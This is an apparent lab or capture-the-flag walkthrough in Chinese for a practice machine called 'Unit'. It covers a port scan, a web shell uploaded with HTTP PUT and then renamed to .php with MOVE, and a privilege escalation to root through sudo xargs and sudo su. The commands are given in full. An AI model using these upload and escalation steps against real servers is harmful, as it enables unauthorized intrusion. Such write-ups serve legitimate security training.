# 靶场练习
下载:Unit
Nat,IP: 192.168.1.131
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http nginx 1.22.1 | |
|_http-server-header: nginx/1.22.1 | |
|_http-title: 415 Unsupported Media Type | |
8080/tcp open http nginx 1.22.1 | |
| http-methods: | |
|_ Potentially risky methods: PUT MOVE | |
|_http-title: 415 Unsupported Media Type | |
|_http-server-header: nginx/1.22.1 |
8080 能 PUT 和 MOVE?!
PUT 一下发现 404,但是想到能够 MOV,是不是 php 不行?
curl -X PUT --upload-file shell.txt http://192.168.1.131:8080/shell.txt 发现可以上传,再 MOVE 一下: curl -X MOVE -H 'Destination: http://192.168.1.131:8080/shell.php' http://192.168.1.131:8080/shell.txt
监听、访问,拿到 shell
# 提权
sudo -l 发现有 xargs 权限
sudo -u jones xargs -a /dev/null bash 拿到 jones 的 shell
sudo -l 发现有 su 权限,直接 sudo su 拿到 root
# 小结
easy
